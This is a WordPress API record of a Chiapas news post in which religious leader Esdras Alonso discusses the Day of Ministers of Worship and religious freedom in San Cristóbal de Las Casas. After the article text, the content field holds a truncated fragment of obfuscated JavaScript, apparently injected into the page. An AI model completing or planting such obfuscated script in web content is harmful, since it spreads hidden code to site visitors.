{"id":11389,"date":"2023-08-17T23:00:10","date_gmt":"2023-08-17T23:00:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11389"},"modified":"2023-08-17T23:00:10","modified_gmt":"2023-08-17T23:00:10","slug":"dia-del-ministro-de-culto-muestra-de-la-diversidad-y-apertura-que-hay-en-la-actualidad-en-cuanto-a-la-libertad-de-culto-esdras-alonso","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11389","title":{"rendered":"D\u00eda del Ministro de Culto, muestra de la diversidad y apertura que hay en la actualidad en cuanto a la libertad de culto: Esdras Alonso"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-11390\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-05-04-at-3.11.19-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El l\u00edder de la congregaci\u00f3n religiosa Alas de \u00c1guila, Esdras Alonso Gonz\u00e1lez, record\u00f3 que en esta fecha se celebra el D\u00eda del Ministro de Culto, instaurado en el trienio de Marco Cancino, que gobernaba cuando el Papa Francisco visit\u00f3 San Crist\u00f3bal y esto es una muestra de la diversidad y apertura que hay en la actualidad en cuanto a la libertad de culto. En un escrito Alonso Gonz\u00e1lez record\u00f3 que en el mes de febrero del a\u00f1o 2016 visit\u00f3 nuestra ciudad el representante mundial de la Iglesia Cat\u00f3lica Apost\u00f3lica y Romana  el Papa Francisco; &#8220;en su discurso pidi\u00f3 perd\u00f3n a los pueblos ind\u00edgenas; todo el aparato del Estado se movi\u00f3 para tal acontecimiento, s\u00f3lo el Estado de Chiapas aport\u00f3 50 millones de pesos para dicho evento , argumentando que se trataba de un jefe de Estado que ven\u00eda a la ciudad&#8221;. &#8220;Efectivamente , representante de la Iglesia Cat\u00f3lica y cabeza del Estado Vaticano; la sorpresa del Papa es que se encontr\u00f3 que la ciudad estaba gobernada por un protestante ,  el Ing. Marco Antonio Cancino Gonz\u00e1lez; se\u00f1al de nuevos tiempos en el \u00e1mbito religioso en Chiapas y especialmente en nuestra ciudad; la m\u00e1s diversa y plural en el \u00e1mbito religioso; desde cat\u00f3licos, evang\u00e9licos , Isl\u00e1micos, budistas, anglicanos, juda\u00edsmo, iglesia tradicional de la costumbre y m\u00e1s de un centenar de diversos movimientos religiosos&#8221;, agreg\u00f3. Asimismo, mencion\u00f3 que gobernar  a una ciudad as\u00ed no es tarea f\u00e1cil, se requiere de sensibilidad, conocimiento en el tema y  una mentalidad abierta al di\u00e1logo y al consenso; &#8220;fue el motivo por el cual se present\u00f3 una iniciativa en el seno del cabildo de celebrar un d\u00eda al a\u00f1o a los diversos ministros religiosos que operan en el municipio de San Crist\u00f3bal de las Casas; que deber\u00eda abrirse un di\u00e1logo entre todas las confesiones religiosas; el d\u00eda 25 de Octubre del a\u00f1o 2015 el Papa Francisco present\u00f3 una iniciativa en la ONU  y precisamente por eso  escogi\u00f3 venir a Chiapas para promover lo que en su momento \u00e9l llam\u00f3 la Bula Papal &#8221; Misericordia Vuoto&#8221;. &#8220;Esta es la raz\u00f3n porque al Obispo Felipe Arizmendi Esquivel lo hicieron cardenal a\u00f1os despu\u00e9s; sin duda el partido Verde Ecologista observ\u00f3 la importancia de tomar en cuenta a la diversidad de credo, al llegar el partido Morena al poder en el municipio en el a\u00f1o 2018 se ampar\u00f3 en contra de este acuerdo de cabildo que promov\u00eda la convivencia entre distintos credos, fue muy radical su posici\u00f3n en contra de las Iglesias , de tal manera que el monumento a la Biblia fue derribado a marrazos, lo destruyeron , un grave error que cometi\u00f3 el partido morena, no respet\u00f3 la libertad de credo; situaci\u00f3n que pes\u00f3 en la siguiente elecci\u00f3n en el municipio y en toda la regi\u00f3n de los Altos donde despu\u00e9s perdieron la mayor\u00eda de los municipio&#8221;. Por \u00faltimo, asegur\u00f3 que quien se olvida de las comunidades religiosas &#8220;pagar\u00e1 la factura en las elecciones pr\u00f3ximas; no pueden hablar de inclusi\u00f3n los que promueven la discriminaci\u00f3n; es tiempo de di\u00e1logo, de apertura, todos construimos la paz , o todos de alguna manera omitimos y somos responsables hasta de nuestro silencio&#8221;.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El l\u00edder de la congregaci\u00f3n religiosa Alas de \u00c1guila, Esdras Alonso Gonz\u00e1lez, record\u00f3 que en esta fecha se celebra el D\u00eda del Ministro de Culto, instaurado en el trienio de Marco Cancino, que gobernaba cuando el Papa Francisco visit\u00f3 San Crist\u00f3bal y esto es una muestra de la diversidad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11390,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11389","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11389","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11389"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11389\/revisions"}],"predecessor-version":[{"id":11391,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11389\/revisions\/11391"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11390"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11389"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11389"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11389"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}